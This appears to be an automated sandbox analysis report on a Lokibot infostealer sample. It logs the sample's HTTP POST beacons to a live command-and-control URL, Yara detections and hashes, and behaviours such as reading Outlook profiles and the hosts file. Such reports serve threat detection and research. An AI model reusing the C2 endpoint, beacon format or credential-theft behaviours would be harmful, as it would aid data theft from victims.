Source: global traffic	HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close

Source: wi7zJOZT2r.exe	String found in binary or memory: http://www.ibsensoftware.com/
Source: wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
Source: wi7zJOZT2r.exe	String found in binary or memory: https://publicspeaking.co.id/cjay/Panel/five/fre.php
Source: wi7zJOZT2r.exe, 00000000.00000002.368819944.0000000002977000.00000004.00000020.00020000.00000000.sdmp, wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://publicspeaking.co.id/cjay/Panel/five/fre.php8

Source: unknown

HTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 190Connection: close

Source: unknown

DNS traffic detected: queries for: publicspeaking.co.id

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_00404ED4 recv,

0_2_00404ED4

Source: wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Loki Payload Author: kevoreilly
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: wi7zJOZT2r.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: wi7zJOZT2r.exe, type: SAMPLE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: 0_2_0040549C		0_2_0040549C
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: 0_2_004029D4		0_2_004029D4

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: String function: 00405B6F appears 41 times

Source: wi7zJOZT2r.exe	ReversingLabs: Detection: 100%
Source: wi7zJOZT2r.exe	Virustotal: Detection: 88%

Source: wi7zJOZT2r.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

0_2_0040650A

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/2@7/2

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

0_2_0040434D

Source: wi7zJOZT2r.exe, 00000000.00000003.359825362.0000000000557000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: wi7zJOZT2r.exe, type: SAMPLE
Source: Yara match	File source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTR

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AD4
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AFC

Source: wi7zJOZT2r.exe

Static PE information: section name: .x

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wi7zJOZT2r.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
